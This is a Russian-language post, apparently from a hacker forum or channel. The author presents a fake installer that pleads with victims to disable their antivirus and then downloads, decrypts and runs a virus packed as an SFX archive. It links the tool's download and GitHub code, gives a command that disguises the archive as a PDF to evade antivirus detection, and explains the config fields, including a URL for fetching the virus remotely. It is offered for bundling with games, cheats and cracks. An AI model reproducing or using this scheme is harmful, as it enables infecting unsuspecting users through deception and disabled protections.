Привет, это Енот, и снова я решел поделиться с вами идей. В большинстве случаев установка на машину вируса, сопровождается, причем специально, окнами ошибок или просто остается без внимания. Но я хочу предложить способ, который вас наверное заинтересует. Чем он по моему мнению лучше выше перечисленных?

У меня есть только один аргумент: Если использовать немножко СИ, то мы получим установку с отключенным антивирусом, в случае когда мы могли бы её и не получить вовсе.... Он заключается в создании фейкового установщика(умоляющего выключить антивирь), который к тому же является загрузчиком и распаковщиком-расшифратором нашего "sfx" архива-вируса.



Установщик находится по адресу: https://cloud.mail.ru/public/F4vt/x4JeZsDLd
Его код на гитхабе: https://github.com/enot-pogromist/fake_installer_downloader

Немного помучавшись, я сделал его версию, что бы вы могли её переделать для своих нужд и под свои игры, читы, кряки, неважно вообщем. Интерфейс у установщика худо-бедно настраиваемый, единственное, что нельзя изменить так это расцветку, выполненую в палитре #FF6A00 и #323232, интерфейс легко перерисовывается: состоит из двух картинок и значка, так же имеет текст с просьбой отключить антивирус в файле "conf.yml".

Но прежде всех действий, нам нужно будет заархивировать наш SFX архив специальным архиватором, который обеспечит хоть какую-то безпалевность:

.\patch.exe a install.pdf install.exe

Код

.\patch.exe a install.pdf install.exe

SFX архив у меня называется install.exe, в результате он превращается в файл под названием install.pdf, что по сути является архивом, который никак не просматривается антивирусами.

Установщик, как я говорил сверху, умеет скачивать - разархивировать - запускать, в настройках файла "conf.yml" в полях нужно изменить след. зн-я:

url: http://www.futurecrew.com/skaven/song_files/mp3/razorback.mp3 < - если вы хотите вирус из интернета, то можете заменить ссылку
txt1: Начать установку < - название кнопки 1
txt2: Отменить установку < - название кнопки 2
arhiv: install.pdf < - имя получившегося архива
setup: install.exe < - имя нашего sfx архива

Код

url: http://www.futurecrew.com/skaven/song_files/mp3/razorback.mp3  < -   если вы хотите вирус из интернета, то можете заменить ссылку

txt1: Начать установку                                                                           < -   название кнопки 1

txt2: Отменить установку                                                                      < -   название кнопки 2

arhiv: install.pdf                                                                                       < -   имя получившегося архива

setup: install.exe                                                                                     < -   имя нашего sfx архива

Все остальные параметры в файле конф являются текстом всплывающего окна, в котором вы его и увидите.
Так же вы можете поменять не только картинки-текст, но и шрифт заменив файл "font.ttf" на свой "font.ttf"

Подписывайтесь на канал, жалко чё?:)

#Моя статья